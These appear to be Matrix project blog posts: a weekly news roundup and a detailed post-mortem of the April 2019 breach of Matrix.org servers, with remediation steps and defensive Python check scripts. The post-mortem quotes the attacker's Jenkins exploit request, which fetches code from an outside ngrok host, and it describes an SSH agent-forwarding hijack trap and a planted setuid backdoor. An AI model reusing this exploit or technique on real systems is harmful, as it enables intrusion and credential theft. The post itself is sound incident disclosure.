  • Clean up some code in the server-key Keyring. (#5001)
  • Convert SYNAPSE_NO_TLS Docker variable to boolean for user friendliness. Contributed by Gabriel Eckerson. (#5005)
  • Refactor synapse.storage._base._simple_select_list_paginate. (#5007)
  • Store the notary server name correctly in server_keys_json. (#5024)
  • Rewrite Datastore.get_server_verify_keys to reduce the number of database transactions. (#5030)
  • Remove extraneous period from copyright headers. (#5046)
  • Update documentation for where to get Synapse packages. (#5067)
  • Add workarounds for pep-517 install errors. (#5098)
  • Improve logging when event-signature checks fail. (#5100)
  • Factor out an "assert_requester_is_admin" function. (#5120)
  • Remove the requirement to authenticate for /admin/server_version. (#5122)
  • Prevent an exception from being raised in an IResolutionReceiver and use a more generic error message for blacklisted URL previews. (#5155)
  • Run black on the tests directory. (#5170)
  • Fix CI after new release of isort. (#5179)

This Week in Matrix 2019-05-10

10.05.2019 00:00 — This Week in MatrixBen Parsons

🔗Matrix Live

This week Neil and Matthew are talking about recent security issues - this is a really long and detailed chat, but you can skip to around the 32 minute mark to hear about other news - including progress on reactions. Reminder that for a good "big picture" overview of the progress of Matrix, you can look at the Homeserver High Level Roadmap.

🔗Dept of Servers

🔗Synapse

Neil, Synapse-dev wrangler:

Reactions continues at full speed: we have a draft PR and will be implementing over the coming week. The ability to blacklist IPs over federation will land imminently, as will a fix for a nasty device management bug that led to a spate of E2E errors. Next week is all about Reactions, resuming work on the small homeserver project and finally getting back to Synapse 1.0 blockers following all the remediation drama of the past few weeks. With any luck we’ll have a new Synapse release for you next week.

🔗Dept of Encryption

🔗Pantalaimon

Says poljar:

  • Pantalaimon received a configuration file. The configuration file adds the ability to configure multiple Homeservers and pantalaimon will run having each Homeserver exposed on a different TCP port.
  • The panctl utility has received support for more commands, it now has the ability to accept SAS requests, confirm them, import/export keys, list pan users as well as list devices of users. Completions for the commands were also added.

🔗Dept of Clients

🔗Pattle - big update!

Wilko announced:

A new version of Pattle is available on F-droid!

Lots of changes again, including:

  • Render HTML formatting in messages!
  • Replies are now rendered!
  • Show date headers between messages of different days!
  • Render usernames with a color in chat timeline
  • Add loading indicators (when logging in, loading chats, etc.)
  • Show error banner at the top if syncing failed
  • Syncing now resumes after a failed attempt (no more restarting)
  • Fix messages not being sent if connection was lost and the app restarted

To install Pattle, add the following repo in F-droid:

https://fdroid.pattle.im/?fingerprint=E91F63CA6AE04F8E7EA53E52242EAF8779559209B8A342F152F9E7265E3EA729

Follow development here and in #pattle:matrix.org!

🔗Fractal

Alexandre Franke:

Although the development pace has been reduced lately, the Fractal team managed to make significant progress towards the 4.2 release. More specifically since our previous news, Chris has landed much of his adaptive view work to get Fractal in a mobile friendly state so it’s ready to run on the Librem 5 once Purism starts shipping them. But he didn’t stop there: eager to see his awesome work in the hands of many people (figuratively, the literal application will have to wait for the phone to be out 😛) as soon as possible, he tackled a few bugs that we really wanted to get sorted out before we got a new version out.

Alexandre also prepared the changelog with a bird’s-eye view of all changes that happened since 4.0.

Last but not least, we had a few external contributions for features such as network proxy support and typing notifications.

🔗Riot Web

Progress on message composer for editing messages.

🔗Riot iOS

  • 0.8.6 was released on Tuesday
  • We are working on reactions

🔗Riot Android

  • We have fixed some minor bugs, our efforts are now on RiotX
  • New FDroid mode support for high service level, regardless of battery usage.

🔗RiotX (Android)

  • Benoit has started to implement the crypto on RiotX. Basically all the legacy has been imported and a migration to the new architecture is done. Lots of plumbing and rework, but it should be the fastest way to support crypto on RiotX.
  • Valere is working on the emoji picker and reactions, and has also added some actions on events (copy, share, view source, etc.)
  • François has added room invitation support. It will be possible soon to see invitations, and accept or reject them.

🔗continuum

yuforia has news on continuum, a JavaFX-based client.

this week in continuum

  • right-click on a room in the room list to send invitations
  • experimental support for receiving invitations
  • membership data are now also persisted in database

🔗FluffyChat available as a Snap package, plus E2EE progress

Krille announced FluffyChat for Linux desktops:

FluffyChat is now also available as a Snap package for desktop Linux
https://snapcraft.io/fluffychat :D
It's a Matrix client written in Qml for Ubuntu Phones. Now it is working for Linux Desktop too.

He also has news to share re E2E:

Progress has been made at the end2end encryption for FluffyChat. Qml bindings for the libolm library are mostly ready and the app can now create keys and upload keys to the server. Device tracking is now implemented too.

E2E when? SOON! See the branch here: https://gitlab.com/ChristianPauly/fluffychat/tree/e2eencryption

🔗Dept of Bridges

🔗New Hangouts bridge from tulir / mautrix

tulir has been using his mautrix-python lib, which was recently used to enable his mautrix-facebook bridge, to bring a new method for Matrix-Hangouts bridging:

New bridge again, this time it's Hangouts: https://github.com/tulir/mautrix-hangouts / #hangouts:maunium.net. As with the Messenger bridge, currently the main difference to matrix-puppet-hangouts is multi-user support (also no hacky JS/Python mixing).

Before making mautrix-hangouts, I put a bunch of the generic bridging parts of mautrix-facebook into mautrix-python's bridge module and used that in both bridges. After Debian 10 is released, I'll drop Python 3.5 compatibility in mautrix-telegram and move it to use mautrix-python and the bridge module too.

Next week I'm planning on adding a bunch of features to both my new bridges, such as bridging formatting and remaining media types (so no new bridges planned for now :D).

🔗Dept of SDKs and Frameworks

🔗QMatrixClient is now "Quotient"

kitsune:

The vote on a new name for the QMatrixClient project has been going on over the past week.
We have a winner now, and the new name is "Quotient"! In the nearest weeks, expect changes in the library code (it's going to be libQuotient from the next release), room aliases (already ongoing), links to the repos etc. etc. Where possible, we're going to smoothen the migration path by providing legacy fallbacks (e.g., the new C++ namespace, Quotient, will be introduced but the old one, QMatrixClient, will stay its synonym, although deprecated).
Just in case you missed all the previous mentions of the topic - it's only related to the overall project and the library, but not the client - its name remains Quaternion.

Why rename?

Because the previous name has been a bit clumsy and, most importantly, the project is no more focusing just on client-side but on a wider set of applications of Matrix (no homeserver in plans though). See also the recent backlog of #qmatrixclient:matrix.org (now also #quotient:matrix.org) earlier this week for the whole discussion

🔗Ruby Matrix SDK hits v0.1.0

Ananace:

Just published version 0.1.0 of the Ruby Matrix SDK, and I've gotten enough testing written now where I feel comfortable not marking this as a pre-production release. So feel free to integrate it into more than just prototypes and experiments. 😃
Relevant links; GitHub page, #ruby-matrix-sdk:kittenface.studio.

🔗Opsdroid big updates, with focus on Matrix

Cadair:

Opsdroid 0.15 has been released, with a lot of matrix focused updates. The biggest of which is support for sending and receiving images and files. There have also been a bunch of bug fixes such as clean exit of the matrix connector and correct handling of events which are not parsed. There are also a bunch of other not matrix specific changes like support for the awesome parse library for string matching. Read all about it in the release blog: https://medium.com/opsdroid/event-dispatching-simple-parsing-and-more-in-v0-15-3f721b8a6d6c

🔗PK interfaces for ruby_olm

Willem:

This week I've been adding PK interfaces to cjhdev's Ruby bindings for Olm, in preparation of improving my Tchap proxy. The PK interfaces can be found in my fork of ruby_olm. Building the native extensions for the gem has had a major overhaul, so no pull request yet.

🔗Dept of Ops

🔗matrix-docker-ansible-deploy update

It's been a few weeks since we heard from Slavi about matrix-docker-ansible-deploy, but he's been working away on it:

We haven't shared any matrix-docker-ansible-deploy updates lately, but we've had lots of community contributions.

Most of it has been bug fixes and various internal improvements, but we've also landed a few large features. Here's what's most interesting lately:

🔗Dept of Status of Matrix

jaywink, maintainer of https://the-federation.info, told us what we all know to be true: Matrix is great and is getting more popular:

Matrix (Synapse) jumps to second place in https://the-federation.info site, which lists servers of the federated social web. Help us map the true size of the Matrixverse by adding your server by going to https://the-federation.info/register/yourdomain.tld. Note, SRV and well-known lookups not yet working, so registration needs to happen with the Matrix server real domain (and port if any).

🔗That's all I know

See you next week, and be sure to stop by #twim:matrix.org with your updates!

PS to people who would normally be reading this in their own RSS reader - I apologise, we'll get the full-article feed back up soon.

Post-mortem and remediations for Apr 11 security incident

08.05.2019 00:00 — General, SecurityMatthew Hodgson

🔗Introduction

Hi all,

On April 11th we dealt with a major security incident impacting the infrastructure which runs the Matrix.org homeserver - specifically: removing an attacker who had gained superuser access to much of our production network. We provided updates at the time as events unfolded on April 11 and 12 via Twitter and our blog, but in this post we’ll try to give a full analysis of what happened and, critically, what we have done to avoid this happening again in future. Apologies that this has taken several weeks to put together: the time-consuming process of rebuilding after the breach has had to take priority, and we also wanted to get the key remediation work in place before writing up the post-mortem.

Firstly, please understand that this incident was not due to issues in the Matrix protocol itself or the wider Matrix network - and indeed everyone who wasn’t on the Matrix.org server should have barely noticed. If you see someone say “Matrix got hacked”, please politely but firmly explain to them that the servers which run the oldest and biggest instance got compromised via a Jenkins vulnerability and bad ops practices, but the protocol and network itself was not impacted. This is not to say that the Matrix protocol itself is bug free - indeed we are still in the process of exiting beta (delayed by this incident), but this incident was not related to the protocol.

Before we get stuck in, we would like to apologise unreservedly to everyone impacted by this whole incident. Matrix is an altruistic open source project, and our mission is to try to make the world a better place by providing a secure decentralised communication protocol and network for the benefit of everyone; giving users total control back over how they communicate online.

In this instance, our focus on trying to improve the protocol and network came at the expense of investing sysadmin time around the legacy Matrix.org homeserver and project infrastructure which we provide as a free public service to help bootstrap the Matrix ecosystem, and we paid the price.

This post will hopefully illustrate that we have learnt our lessons from this incident and will not be repeating them - and indeed intend to come out of this episode stronger than you can possibly imagine :)

Meanwhile, if you think that the world needs Matrix, please consider supporting us via Patreon or Liberapay. Not only will this make it easier for us to invest in our infrastructure in future, it also makes projects like Pantalaimon (E2EE compatibility for all Matrix clients/bots) possible, which are effectively being financed entirely by donations. The funding we raised in Jan 2018 is not going to last forever, and we are currently looking into new longer-term funding approaches - for which we need your support.

Finally, if you happen across security issues in Matrix or matrix.org’s infrastructure, please please consider disclosing them responsibly to us as per our Security Disclosure Policy, in order to help us improve our security while protecting our users.

🔗History

Firstly, some context about Matrix.org’s infrastructure. The public Matrix.org homeserver and its associated services run across roughly 30 hosts, spanning the actual homeserver, its DBs, load balancers, intranet services, website, bridges, bots, integrations, video conferencing, CI, etc. We provide it as a free public service to the Matrix ecosystem to help bootstrap the network and make life easier for first-time users.

The deployment which was compromised in this incident was mainly set up back in Aug 2017 when we vacated our previous datacenter at short notice, thanks to our funding situation at the time. Previously we had been piggybacking on the well-managed production datacenters of our previous employer, but during the exodus we needed to move as rapidly as possible, and so we spun up a bunch of vanilla Debian boxes on UpCloud, and shifted over services as simply as we could. We had no dedicated ops people on the project at that point, so this was a subset of the Synapse and Riot/Web dev teams putting on ops hats to rapidly get set up, whilst also juggling the daily fun of keeping the ever-growing Matrix.org server running and trying to actually develop and improve Matrix itself.

In practice, this meant that some corners were cut that we expected to be able to come back to and address once we had dedicated ops staff on the team. For instance, we skipped setting up a VPN for accessing production in favour of simply SSHing into the servers over the internet. We also went for the simplest possible config management system: checking all the configs for the services into a private git repo. We also didn’t spend much time hardening the default Debian installations - for instance, the default image allows root access via SSH and allows SSH agent forwarding, and the config wasn’t tweaked. This is particularly unfortunate, given our previous production OS (a customised Debian variant) had got all these things right - but the attitude was that because we’d got this right in the past, we’d be easily able to get it right in future once we fixed up the hosts with proper configuration management etc.

Separately, we also made the controversial decision to maintain a public-facing Jenkins instance. We did this deliberately, despite the risks associated with running a complicated publicly available service like Jenkins, but reasoned that as a FOSS project, it is imperative that we are transparent and that continuous integration results and artefacts are available and directly visible to all contributors - whether they are part of the core dev team or not. So we put Jenkins on its own host, gave it some macOS build slaves, and resolved to keep an eye open for any security alerts which would require an upgrade.

Lots of stuff then happened over the following months - we secured funding in Jan 2018; the French Government began talking about switching to Matrix around the same time; the pressure of getting Matrix (and Synapse and Riot) out of beta and to a stable 1.0 grew ever stronger; the challenge of handling the ever-increasing traffic on the Matrix.org server soaked up more and more time, and we started to see our first major security incidents (a major DDoS in March 2018, mitigated by shielding behind Cloudflare, and various attacks on the more beta bits of Matrix itself).

Good news was that funding meant that in March 2018 we were able to hire a fulltime ops specialist! By this point, however, we had two new critical projects in play to try to ensure long-term funding for the project via New Vector, the startup formed in 2017 to hire the core team. Firstly, to build out Modular.im as a commercial-grade Matrix SaaS provider, and secondly, to support France in rolling out their massive Matrix deployment as a flagship example of how Matrix can be used. And so, for better or worse, the brand new ops team was given a very clear mandate: to largely ignore the legacy datacenter infrastructure, and instead focus exclusively on building entirely new, pro-grade infrastructure for Modular.im and France, with the expectation of eventually migrating Matrix.org itself into Modular when ready (or just turning off the Matrix.org server entirely, once we have account portability).

So we ended up with two production environments; the legacy Matrix.org infra, whose shortcomings continued to linger and fester off the radar, and separately all the new Modular.im hosts, which are almost entirely operationally isolated from the legacy datacenter; whose configuration is managed exclusively by Ansible, and which have sensible SSH configs which disallow root login etc. With 20/20 hindsight, the failure to prioritise hardening the legacy infrastructure is quite a good example of the normalisation of deviance - we had gotten too used to the bad practices; all our attention was going elsewhere; and so we simply failed to prioritise getting back to fix them.

🔗The Incident

The first evidence of things going wrong was a tweet from JaikeySarraf, a security researcher who kindly reached out via DM at the end of Apr 9th to warn us that our Jenkins was outdated after stumbling across it via Google. In practice, our Jenkins was running version 2.117 with plugins which had been updated on an ad hoc basis, and we had indeed missed the security advisory (partially because most of our CI pipelines had moved to TravisCI, CircleCI and Buildkite), and so on Apr 10th we updated Jenkins and investigated to see if any vulnerabilities had been exploited.

In this process, we spotted an unrecognised SSH key in /root/.ssh/authorized_keys2 on the Jenkins build server. This was suspicious both due to the key not being in our key DB and the fact the key was stored in the obscure authorized_keys2 file (a legacy location from back when OpenSSH transitioned from SSH1->SSH2). Further inspection showed that 19 hosts in total had the same key present in the same place.
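The check described above (an SSH key that is not in the key DB, sitting in either authorized_keys or the legacy authorized_keys2 file) can be sketched in a few lines of Python. This is only an illustration, not the tooling we used: the function names are hypothetical, the "key DB" is assumed to be a plain set of base64 key blobs, and option strings containing spaces are not parsed properly.

```python
from pathlib import Path
from typing import List, Optional, Set, Tuple

# Prefixes of OpenSSH public key types (ssh-rsa, ssh-ed25519, ecdsa-sha2-..., sk-...).
KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")


def key_blob(line: str) -> Optional[str]:
    """Return the base64 key blob from one authorized_keys line, or None."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    fields = line.split()
    # Options may precede the key type, so look for the type and take the next field.
    for i, field in enumerate(fields[:-1]):
        if field.startswith(KEY_TYPE_PREFIXES):
            return fields[i + 1]
    return None


def unknown_keys(home: Path, known_blobs: Set[str]) -> List[Tuple[Path, str]]:
    """List (file, blob) pairs for keys under home/.ssh that are not in known_blobs."""
    findings = []
    # Check the legacy authorized_keys2 location as well as the usual one.
    for name in ("authorized_keys", "authorized_keys2"):
        path = home / ".ssh" / name
        if not path.is_file():
            continue
        for line in path.read_text().splitlines():
            blob = key_blob(line)
            if blob is not None and blob not in known_blobs:
                findings.append((path, blob))
    return findings
```

Running something like unknown_keys(Path("/root"), known) on each host would flag keys of the kind we found, assuming the set of known blobs is complete and trustworthy.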

At this point we started doing forensics to understand the scope of the attack and plan the response, as well as taking snapshots of the hosts to protect data in case the attacker realised we were aware and attempted to vandalise or cover their tracks. Findings were:

  • The attacker first compromised Jenkins on Mar 13th by exploiting a vulnerability in it, as recorded by this request in our access logs:

matrix.org:443 151.34.xxx.xxx - - [13/Mar/2019:18:46:07 +0000] "GET /jenkins/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0A@GrabResolver(name=%27orange.tw%27,%20root=%27http://5f36xxxx.ngrok.io/jenkins/%27)%0A@Grab(group=%27tw.orange%27,%20module=%270x3a%27,%20version=%27000%27)%0Aimport%20Orange; HTTP/1.1" 500 6083 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"

  • This allowed them to further compromise a Jenkins slave (Flywheel, an old Mac Pro used mainly for continuous integration testing of Riot/iOS and Riot/Android). The attacker put an SSH key on the box, which was unfortunately exposed to the internet via a high-numbered SSH port for ease of admin by remote users, and placed a trap which waited for any user to SSH into the jenkins user, which would then hijack any available forwarded SSH keys to try to add the attacker’s SSH key to root@ on as many other hosts as possible.
  • On Apr 4th at 12:32 GMT, one of the Riot devops team members SSH’d into the Jenkins slave to perform some admin, forwarding their SSH key for convenience for accessing other boxes while doing so. This triggered the trap, and resulted in the majority of the malicious keys being inserted to the remote hosts.
  • From this point on, the attacker proceeded to explore the network, performing targeted exfiltration of data (e.g. our passbolt database, which is thankfully end-to-end encrypted via GPG) seemingly targeting credentials and data for use in onward exploits, and installing backdoors for later use (e.g. a setuid root shell at /usr/share/bsd-mail/shroot).
  • The majority of access to the hosts occurred between Apr 4th and 6th.
  • There was no evidence of large-scale data exfiltration, based on analysing network logs.
  • There was no evidence of Modular.im hosts having been compromised. (Modular’s provisioning system and DB did run on the old infrastructure, but it was not used to tamper with the modular instances themselves).
  • There was no evidence of the identity server databases having been compromised.
  • There was no evidence of tampering in our source code repositories.
  • There was no evidence of tampering of our distributed software packages.
  • Two more hosts were compromised on Apr 5th by similarly hijacking another developer’s SSH agent as the dev logged into a production server.
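For anyone wanting to check their own logs for a request shaped like the one in our access log above, here is a rough Python sketch. It assumes one request per log line and simply looks for a checkScriptCompile call whose value parameter contains an @Grab annotation; the function name is hypothetical, and a real exploit attempt may well be encoded differently, so treat an empty result as inconclusive.

```python
import re
from typing import Iterable, List
from urllib.parse import unquote

# checkScriptCompile being passed Groovy @Grab... annotations, as in the logged request.
SUSPICIOUS = re.compile(r"checkScriptCompile\?value=.*@Grab", re.IGNORECASE | re.DOTALL)


def suspicious_requests(lines: Iterable[str]) -> List[str]:
    """Return the log lines that look like the Jenkins request shown above."""
    hits = []
    for line in lines:
        # Decode %XX escapes first so that %40Grab is treated the same as @Grab.
        if SUSPICIOUS.search(unquote(line)):
            hits.append(line)
    return hits
```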

By around 2am on Apr 11th we felt that we had sufficient visibility on the attacker’s behaviour to be able to do a first pass at evicting them by locking down SSH, removing their keys, and blocking as much network traffic as we could.

We then started a full rebuild of the datacenter on the morning of Apr 11th, given that the only responsible course of action when an attacker has acquired root is to salt the earth and start over afresh. This meant rotating all secrets; isolating the old hosts entirely (including ones which appeared to not have been compromised, for safety), spinning up entirely new hosts, and redeploying everything from scratch with the fresh secrets. The process was significantly slowed down by colliding with unplanned maintenance and provisioning issues in the datacenter provider and unexpected delays spent waiting to copy data volumes between datacenters, but by 1am on Apr 12th the core matrix.org server was back up, and we had enough of a website up to publish the initial security incident blog post. (This was actually static HTML, faked by editing the generated WordPress content from the old website. We opted not to transition any WordPress deployments to the new infra, in a bid to keep our attack surface as small as possible going forwards).

Given the production database had been accessed, we had no choice but to drop all access_tokens for matrix.org, to stop the attacker accessing user accounts, causing a forced logout for all users on the server. We also recommended all users change their passwords, given the salted & hashed (4096 rounds of bcrypt) passwords had likely been exfiltrated.

At about 4am we had enough of the bare necessities back up and running to pause for sleep.

🔗The Defacement

At around 7am, we were woken up to the news that the attacker had managed to replace the matrix.org website with a defacement (as per https://github.com/vector-im/riot-web/issues/9435). It looks like the attacker didn’t think we were being transparent enough in our initial blog post, and wanted to make it very clear that they had access to many hosts, including the production database and had indeed exfiltrated password hashes. Unfortunately it took a few hours for the defacement to get on our radar as our monitoring infrastructure hadn’t yet been fully restored and the normal paging infrastructure wasn’t back up (we now have emergency-emergency-paging for this eventuality).

On inspection, it transpired that the attacker had not compromised the new infrastructure, but had used Cloudflare to repoint the DNS for matrix.org to a defacement site hosted on GitHub. Now, as part of rotating the secrets which had been compromised via our configuration repositories, we had of course rotated the Cloudflare API key (used to automate changes to our DNS) during the rebuild on Apr 11. When you log into Cloudflare, it looks something like this...

Cloudflare login UI

...where the top account is your personal one, and the bottom one is an admin role account. To rotate the admin API key, we clicked on the admin account to log in as the admin, and then went to the Profile menu, found the API keys and hit the Change API Key button.

Unfortunately, when you do this, it turns out that the API Key it changes is your personal one, rather than the admin one. As a result, in our rush we thought we’d rotated the admin API key, but we hadn’t, thus accidentally enabling the defacement.

To flush out the defacement we logged in directly as the admin user and changed the API key, pointed the DNS back at the right place, and continued on with the rebuild.

🔗The Rebuild

The goal of the rebuild has been to get all the higher priority services back up rapidly - whilst also ensuring that good security practices are in place going forwards. In practice, this meant making some immediate decisions about how to ensure the new infrastructure did not suffer the same issues and fate as the old. Firstly, we ensured the most obvious mistakes that made the breach possible were mitigated:

  • Access via SSH restricted as heavily as possible
  • SSH agent forwarding disabled server-side
  • All configuration to be managed by Ansible, with secrets encrypted in vaults, rather than sitting in a git repo.
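The first two items above map onto sshd_config directives, and a quick audit for them can be sketched as follows. This is an illustrative check rather than our actual Ansible configuration: it only reads the global section of the file (it stops at the first Match block), treats an unset directive as a finding rather than modelling OpenSSH's defaults, and the function names are hypothetical.

```python
from typing import Dict

# Directives this sketch insists on: no root login over SSH, no agent forwarding.
REQUIRED = {"permitrootlogin": "no", "allowagentforwarding": "no"}


def parse_global_settings(text: str) -> Dict[str, str]:
    """Parse keyword/value pairs from the global part of an sshd_config."""
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        keyword = parts[0].lower()  # sshd_config keywords are case-insensitive
        if keyword == "match":
            break  # settings after Match only apply conditionally
        value = parts[1].strip().lower() if len(parts) > 1 else ""
        # sshd uses the first value it obtains for each keyword.
        settings.setdefault(keyword, value)
    return settings


def audit_sshd_config(text: str) -> Dict[str, str]:
    """Return {directive: actual value} for every required directive that is not met."""
    settings = parse_global_settings(text)
    return {
        key: settings.get(key, "<unset>")
        for key, wanted in REQUIRED.items()
        if settings.get(key) != wanted
    }
```

An empty result means both directives are explicitly set to no in the global section.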

Then, whilst reinstating services on the new infra, we opted to review everything being installed for security risks, replacing with securer alternatives if needed, even if it slowed down the rebuild. Particularly, this meant:

  • Jenkins has been replaced by Buildkite
  • WordPress has been replaced by static generated sites (e.g. Gatsby)
  • cgit has been replaced by GitLab.
  • Entirely new packaging building, signing & distribution infrastructure (more on that later)
  • etc.

Now, while we restored the main synapse (homeserver), sydent (identity server), sygnal (push server), databases, load balancers, intranet and website on Apr 11, it’s important to understand that there were over 100 other services running on the infra - which is why it is taking a while to get full parity with where we were before.

In the interest of transparency (and to try to give a sense of scale of the impact of the breach), here is the public-facing service list we restored, showing priority (1 is top, 4 is bottom) and the % restore status as of May 4th:

Service status

Apologies again that it took longer to get some of these services back up than we’d preferred (and that there are still a few pending). Once we got the top priority ones up, we had no choice but to juggle the remainder alongside remediation work, other security work, and actually working on Matrix(!), whilst ensuring that the services we restored were being restored securely.

🔗Remediations

Once the majority of the P1 and P2 services had been restored, on Apr 24 we held a formal retrospective for the team on the whole incident, which in turn kicked off a full security audit over the entirety of our infrastructure and operational processes.

We’d like to share the resulting remediation plan in as much detail as possible, in order to show the approach we are taking, and in case it helps others avoid repeating the mistakes of our past. Inevitably we’re going to have to skip over some of the items, however - after all, remediations imply that there’s something that could be improved, and for obvious reasons we don’t want to dig into areas where remediation work is still ongoing. We will aim to provide an update on these once ongoing work is complete, however.

We should also acknowledge that after being removed from the infra, the attacker chose to file a set of GitHub issues on Apr 12 to highlight some of the security issues that they had taken advantage of during the breach. Their actions matched the findings from our forensics on Apr 10, and their suggested remediations aligned with our plan.

We’ve split the remediation work into the following domains.

🔗SSH

Some of the biggest issues exposed by the security breach concerned our use of SSH, which we’ll take in turn:

🔗SSH agent forwarding should be disabled.

SSH agent forwarding is a beguilingly convenient mechanism which allows a user to ‘forward’ access to their private SSH keys to a remote server whilst logged in, so they can in turn access other servers via SSH from that server. Typical uses are to make it easy to copy files between remote servers via scp or rsync, or to interact with a SCM system such as GitHub via SSH from a remote server. Your private SSH keys end up available for use by the server for as long as you are logged into it, letting the server impersonate you.

The common wisdom on this tends to be something like: “Only use agent forwarding when connecting to trusted hosts”. For instance, GitHub’s guide to using SSH agent forwarding says:

Warning: You may be tempted to use a wildcard like Host * to just apply this setting (ForwardAgent yes) to all SSH connections. That's not really a good idea, as you'd be sharing your local SSH keys with every server you SSH into. They won't have direct access to the keys, but they will be able to use them as you while the connection is established. You should only add servers you trust and that you intend to use with agent forwarding.

As a result, several of the team doing ops work had set ForwardAgent yes under Host *.matrix.org in their ssh client configs, thinking “well, what can we trust if not our own servers?”

This was a massive, massive mistake.

If there is one lesson everyone should learn from this whole mess, it is: SSH agent forwarding is incredibly unsafe, and in general you should never use it. Not only can malicious code running on the server as that user (or root) hijack your credentials, but your credentials can in turn be used to access hosts behind your network perimeter which might otherwise be inaccessible. All it takes is someone to have snuck malicious code on your server waiting for you to log in with a forwarded agent, and boom, even if it was just a one-off ssh -A.
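To find out whether your own client config has this problem, something like the following Python sketch can list the Host patterns for which ForwardAgent is switched on. It is deliberately simplified and makes assumptions: it only handles the whitespace-separated "Keyword value" form, does not follow Include directives, and reports a Match block by its raw text rather than evaluating it. The function name is hypothetical.

```python
from typing import List


def forwarding_hosts(config_text: str) -> List[str]:
    """Return the Host patterns under which 'ForwardAgent yes' appears."""
    current = ["*"]  # options before the first Host line apply to every host
    found: List[str] = []
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        keyword, value = parts[0].lower(), parts[1].strip()
        if keyword == "host":
            current = value.split()
        elif keyword == "match":
            current = ["Match " + value]
        elif keyword == "forwardagent" and value.lower() == "yes":
            found.extend(current)
    return found
```

Feeding it the contents of ~/.ssh/config and getting back anything at all, let alone a wildcard such as *.matrix.org, is a sign that the setting should be removed.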

Our remediations for this are:

  • Disable all ssh agent forwarding on the servers.
  • If you need to jump through a box to ssh into another box, use ssh -J $host.
  • This can also be used with rsync via rsync -e "ssh -J $host"
  • If you need to copy files between machines, use rsync rather than scp (OpenSSH 8.0’s release notes explicitly recommend using more modern protocols than scp).
  • If you need to regularly copy stuff from one server to another (or use SSH to GitHub to check out something from a private repo), it might be better to have a specific SSH ‘deploy key’ created for this, stored server-side and only able to perform limited actions.
  • If you just need to check out stuff from public git repos, use https rather than git+ssh.
  • Try to educate everyone on the perils of SSH agent forwarding: if our past selves can’t be a good example, they can at least be a horrible warning...
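If you drive ssh or rsync from scripts, the jump-host forms from the list above can be built as argument lists rather than shell strings. The sketch below is only an illustration: the helper names and the hostnames in the usage note are hypothetical, and rsync's -a (archive) flag is our choice for the example rather than something the remediation requires.

```python
import shlex
from typing import List


def ssh_jump_command(jump_host: str, target: str) -> List[str]:
    """Argument list for 'ssh -J jump_host target': your keys never leave your machine."""
    return ["ssh", "-J", jump_host, target]


def rsync_via_jump_command(jump_host: str, source: str, dest: str) -> List[str]:
    """Argument list for rsync that tunnels through jump_host via 'ssh -J'."""
    # rsync's -e option takes the remote shell command as a single string.
    remote_shell = shlex.join(["ssh", "-J", jump_host])
    return ["rsync", "-a", "-e", remote_shell, source, dest]
```

For example, subprocess.run(rsync_via_jump_command("bastion.example.org", "./build/", "web1.internal:/srv/site/"), check=True) would copy a directory through the bastion without any agent forwarding being involved.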

Another approach could be to allow forwarding, but configure your SSH agent to prompt whenever a remote app tries to access your keys. However, not all agents support this (OpenSSH’s does via ssh-add -c, but gnome-keyring for instance doesn’t), and also it might still be possible for a hijacker to race with the valid request to hijack your credentials.

🔗SSH should not be exposed to the general internet

Needless to say, SSH is no longer exposed to the general internet. We are rolling out a VPN as the main access to the dev network, and then SSH bastion hosts to be the only access point into production, using SSH keys to restrict access to be as minimal as possible.

🔗SSH keys should give minimal access

Another major problem was that individual SSH keys gave very broad access. We have gone through and ensured that SSH keys grant the least privilege required to the users in question. In particular, root login should not be available over SSH.

A typical scenario where users might end up with unnecessary access to production is developers who simply want to push new code or check its logs. We are mitigating this by switching over to using continuous deployment infrastructure everywhere rather than developers having to actually SSH into production. For instance, the new matrix.org blog is continuously deployed into production by Buildkite from GitHub without anyone needing to SSH anywhere. Similarly, logs should be available to developers from a logserver in real time, without having to SSH into the actual production host. We’ve already been experimenting internally with sentry for this.

Relatedly, we’ve also shifted to requiring multiple SSH keys per user (per device, and for privileged / unprivileged access), to have finer-grained control over locking down their permissions and revoking them etc. (We had actually already started this process, and while it didn’t help prevent the attack, it did assist with forensics).

🔗Two factor authentication

We are rolling out two-factor authentication for SSH to ensure that even if keys are compromised (e.g. via forwarding hijack), the attacker needs to have also compromised other physical tokens in order to successfully authenticate.

🔗It should be made as hard as possible to add malicious SSH keys

We’ve decided to stop users from being able to directly manage their own SSH keys in production via ~/.ssh/authorized_keys (or ~/.ssh/authorized_keys2 for that matter) - we can see no benefit from letting non-root users set keys.

Instead, keys for all accounts are managed exclusively by Ansible via /etc/ssh/authorized_keys/$account (using sshd’s AuthorizedKeysFile /etc/ssh/authorized_keys/%u directive).

🔗Changes to SSH keys should be carefully monitored

If we’d had sufficient monitoring of the SSH configuration, the breach could have been caught instantly. We are addressing this by managing the keys exclusively via Ansible, and also improving our intrusion detection in general.

Similarly, we are working on tracking changes and additions to other credentials (and enforcing their complexity).
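
As an illustration of the kind of check this implies, the sketch below records a SHA-256 digest for every file in a key directory and reports what has been added, removed or modified since a known-good baseline. The function names are hypothetical and this is not our actual monitoring; it assumes one key file per account, as in the /etc/ssh/authorized_keys/$account layout described above.

```python
import hashlib
from pathlib import Path
from typing import Dict, List


def snapshot(key_dir: Path) -> Dict[str, str]:
    """Map each file name in key_dir to the SHA-256 digest of its contents."""
    return {
        path.name: hashlib.sha256(path.read_bytes()).hexdigest()
        for path in sorted(key_dir.iterdir())
        if path.is_file()
    }


def diff_snapshots(
    baseline: Dict[str, str], current: Dict[str, str]
) -> Dict[str, List[str]]:
    """Return the file names added, removed or modified since the baseline."""
    shared = baseline.keys() & current.keys()
    return {
        "added": sorted(current.keys() - baseline.keys()),
        "removed": sorted(baseline.keys() - current.keys()),
        "modified": sorted(n for n in shared if baseline[n] != current[n]),
    }
```

A periodic job could compare a fresh snapshot against the baseline produced by the last Ansible run and alert on any non-empty list. The baseline itself would need to live somewhere an attacker on the host cannot rewrite it.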

🔗SSH config should be hardened, disabling unnecessary options

